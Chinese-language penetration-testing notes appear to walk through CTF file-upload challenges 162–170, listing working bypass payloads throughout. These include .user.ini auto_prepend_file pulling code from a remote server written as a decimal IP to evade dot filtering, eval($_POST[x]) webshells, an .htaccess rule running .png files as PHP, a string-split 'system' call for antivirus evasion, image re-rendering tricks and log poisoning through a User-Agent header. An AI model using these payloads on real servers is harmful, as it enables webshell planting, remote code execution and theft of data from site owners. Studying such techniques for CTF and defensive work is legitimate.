《渗透测试》WEB攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀 2022 Day32
162 突破.过滤
过滤 . () {} ;等
1.先上传.user.ini文件,通过.user.ini文件包含png文件,然后通过png写入包含木马的文件
这里原本是http://47.75.212.155 因为本关对文件内容 .进行了过滤 所以通过转换成数字就可突破 .的过滤
(原理 将 47.75.212.155 转换成二进制数,然后再讲二进制数转换为十进制数就成htttp://794750069了)
2.利用远程包含IP转换地址后门调用执行
.user.ini auto_prepend_file=png
png include'http://794750069/'>
数字IP转换地址 : https://www.bejson.com/convert/ip2int/
163 突破上传删除
过滤 . () {} ;等 同时文件被删除
直接利用.user.ini包含远程
auto_prepend_file=http://794750069/
auto_prepend_file=http://794750069/
164 png二次渲染
网站通过会对用户上传的图片或其他文件进行处理,为了保证图片在网页上的正常显示,会在图片中添加或删除内容,
这个时候如果对网站未改变的地方写入后门代码,那么通过访问网站存储该图片的地址,通过输入对应的payload就可以完成一些越权操作
二次渲染详解:https://blog.csdn.net/qq_40800734/article/details/105920149
payload:
get 0=system
post 1=tac flag.php
165 jpg二次渲染
1、先上传jpg正常,返回包发现渲染(第一次的图片和第二次经过服务器的图片文件大小发生了变化)
2、上传jpg渲染后保存,生成带代码图片
调用执行:php jpg.php 1.jpg
166 zip调用包含
直接上传zip后修改代码
eval($_POST[x]);?>
167 .htaccess妙用
.htaccess默认不支持nginx,设置后支持
.htaccess可以通过设置实现文件解析配置
将.png后缀的文件解析成php
AddType application/x-httpd-php .png
168 免杀后门
php $a='syste';$b='m';$c=$a.$b;$c('tac ../flagaa.php');?>
169 170日志包含
构造.user.ini利用条件:上传index.php 内容随意(部署的服务器中有index.php这个文件)
上传.user.ini包含日志:auto_prepend_file=/var/log/nginx/access.log
访问地址带后门UA头写入日志:eval($_POST[x]);?>